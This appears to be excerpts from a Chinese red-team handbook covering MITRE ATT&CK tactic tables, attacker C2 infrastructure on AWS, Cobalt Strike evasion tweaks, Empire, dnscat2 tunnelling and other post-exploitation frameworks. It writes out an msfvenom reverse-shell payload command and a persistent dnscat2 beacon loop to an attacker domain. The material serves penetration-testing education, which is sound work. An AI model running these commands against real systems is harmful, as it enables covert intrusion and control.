如果您在网上发现有针对异步社区出品图书的各种形式的盗版行为,包括对图书全部或部分内容的非授权传播,请您将怀疑有侵权行为的链接发邮件给我们。您的这一举动是对作者权益的保护,也是我们持续为您提供有价值的内容的动力之源。 关于异步社区和异步图书 “异步社区”是人民邮电出版社旗下IT专业图书社区,致力于出版精品IT技术图书和相关学习产品,为作译者提供优质出版服务。异步社区创办于2015年8月,提供大量精品IT技术图书和电子书,以及高品质技术文章和视频课程。更多详情请访问异步社区官网https://www.epubit.com。 “异步图书”是由异步社区编辑团队策划出版的精品IT专业图书的品牌,依托于人民邮电出版社近30年的计算机图书出版积累和专业编辑团队,相关图书在封面上印有异步图书的LOGO。异步图书的出版领域包括软件开发、大数据、AI、测试、前端、网络技术等。 异步社区 微信服务号
表1.1 长期控制 权限提升 防御规避 凭证获取 探测 访问特性 管理访问令牌 管理访问令牌 管理账户 账户发现 AppCert Dlls 访问特性 二进制填充 暴力破解 应用程序发现 AppInit Dlls AppCert Dlls 用户账号控制规避 凭证导出 文件和目录发现 应用程序兼容 AppInit Dlls 代码签名 文件中凭证 扫描网络服务 鉴权包 应用程序兼容 组件固件 漏洞利用 网络共享发现 Bootkit 用户账号控制规避 组件对象模型劫持 强制鉴权 外围设备发现 浏览器扩展 Dll搜索顺序劫持 Dll搜索顺序劫持 钩子 权限分组发现 MITRE公司还提供了Mac(见表1.2)和Linux的知识列表。
表1.2 初始控制 执行 长期控制 权限提升 防御规避 凭证获取 突破驱动 AppleScript .bash_profile和.bashrc Dylib劫持 二进制填充 Bash历史命令 公开访问应用程序漏洞利用 命令行接口 浏览器扩展 漏洞利用提升权限 清空历史命令 暴力破解 硬件植入 客户应用程序漏洞利用 创建账户 运行守护进程 代码签名 文件中凭证 鱼叉式网络钓鱼附件 图形用户接口 Dylib 劫持 Plist修改 禁用安全工具 漏洞利用从而获取凭证 鱼叉式网络钓鱼快捷方式 Launchctl 隐藏文件和目录 进程注入 利用漏洞从而规避防御 输入捕获 鱼叉式网络钓鱼服务 本地任务计划 核心模块和扩展 Setuid和setgid 文件删除 输入提示 1.1 假定突破目标演习 每个公司都应该假定目前自身处于一个遭受攻击的环境中。
我使用这些服务的原因是因为它们通常成本非常低(有时是免费的),支持安装Ubuntu服务器,可以部署在世界各地,重要的是它们非常容易安装设置。
由于安装及设置简单,因此本书将重点介绍AWS Lightsail服务器,它提供自动化服务,并且流量通常经过AWS,在成功创建了您喜欢的镜像之后,您可以快速地将该镜像复制到多个服务器,这使得构建命令和控制服务器变得非常容易。
use modules/exploitation/install_update_all。 use modules/intelligence-gathering/install_update_all。 use modules/post-exploitation/install_update_all。 use modules/powershell/install_update_all。 use modules/vulnerability-analysis/install_update_all。
由于这将是您的攻击者服务器,因此您需要限制SSH身份验证的发起位置,Empire/Meterpreter/Cobalt Strike静荷来源,以及您搭建的任何网络钓鱼页面。
如果您还记得2016年年末,有人在Cobalt Strike项目组服务器上找到了未经身份验证的远程执行代码(RCE),那么您肯定不希望存储用户数据的攻击者服务器被突破。
msfvenom --payload windows/x64/meterpreter_reverse_http --format psh --out meterpreter- 64.ps1 LHOST = 127.0.0.1 我们甚至可以在下一阶段再进行混淆,使用Unicorn等工具生成更多混淆的PowerShell Meterpreter静荷,如图1.3所示。
幸运的是,Cobalt Strike 支持突破主机之间采用 SMB网络协议进行命令和控制通信。 这种方式允许一台突破主机连接互联网,网络上的所有其他计算机通过SMB网络协议连接该主机。
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT" header "x-amz-id-2""a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRu Z2tmZGl4aHRvNDVpbgo=" 这个功能已经被应用到许多不同的行动中,许多安全设备已经在所有常见的可移动配置文件中对其创建了签名。
我们为解决这个问题所采取的行动是修改所有静态字符串,更改所有用户代理信息,使用真实证书配置SSL(不使用默认的Cobalt Strike SSL证书),使用抖动,以及更改代理信标的时间。
1.4.3 PowerShell Empire Empire是一个后漏洞利用框架,包括纯PowerShell 2.0 Windows代理和纯Python 2.6/2.7 Linux/macOS代理。 PowerShell Empire是以前的PowerShell Empire和Python EmPyre项目的合并。
在PowerShell方面,Empire支持运行PowerShell代理,无须运行PowerShell.exe,可快速部署后漏洞利用模块,包括键盘记录工具和Mimikatz工具,支持自适应通信方式以规避网络检测,所有这些功能都集成在以可用性为中心的框架中。
正如在本书前两版中提到的,Metasploit可以使用rc文件,实现自动化配置,Empire现在也支持自动运行脚本以提高效率,这将在本书后面的章节进行讨论。
我喜欢查看常用User Agent,并选择其中一个 Host,切换到HTTPS,端口号为443 CertPath,添加SSL证书路径 UserAgent,修改此处,使用常用的User Agent Port,设置443端口 ServerVersion,修改此处,使用常用服务头 所有配置完成,开启监听程序,如图1.6所示。
wget http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7ubuntu0.3_amd64.deb。 dpkg-i libicu55_55.1-7ubuntu0.3_amd64.deb。 wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.2/powershell_ 6.0.2-1.ubuntu.16.04_amd64.deb。 dpkg-i powershell_6.0.2-1.ubuntu.16.04_amd64.deb。
ns1(虚拟专用服务器IP地址) ns2(虚拟专用服务器IP地址) 修改Nameservers为定制模式。 添加ns1.loca1host.com 添加ns2.loca1host.com 如图1.9所示,现在设置名字服务器指向ns1.loca1host.com和ns2.loca1host.com,它们都指向攻击者虚拟专用服务器。
nohup/bin/bash -c "while true; do/opt/dnscat2/client/dnscat loca1host.com --secret 39dfj3hdsfajh37e8c902j --max-retransmits 5; sleep 3600; done" >/dev/null 2>&1 &。
4.使用dnscat2建立隧道 很多时候,攻击者服务器需要通过突破的主机,访问突破主机内网的其他服务器。 使用dnscat2执行此操作的安全方法之一是本地端口路由我们的流量,接着通过隧道传输到网络内部主机。
创建隧道后,在攻击者主机终端根窗口,使用SSH命令登录本地9 999端口,我们可以返回攻击者计算机上的管理员终端窗口,通过SSH命令9 999端口连接到localhost,并通过被攻击者网络上的内部系统身份验证,如图1.12所示。
图1.13 1.4.5 p0wnedShell 正如在p0wnedShell的GitHub页面所介绍的,这个工具是用C#编写的用于攻击目的的PowerShell主机应用程序,它不依赖于powershell.exe,而是在PowerShell运行空间环境(.NET)中运行PowerShell命令和函数。
Pupy 的一个非常棒的功能是,您可以在所有代理上运行Python脚本,而无须在所有主机上实际安装Python。 因此,Pupy是一个很方便的工具,能够帮助用户实现在自定义框架中编写大量攻击脚本的目的。
1.4.7 PoshC2 PoshC2是一个代理,自适应命令和控制框架,完全用PowerShell编写,可以帮助渗透测试人员与红队开展团队合作,开展后漏洞利用和横向移动操作。 PoshC2工具和模块是在PowerShell会话和Metasploit框架的静荷类型的基础上开发的。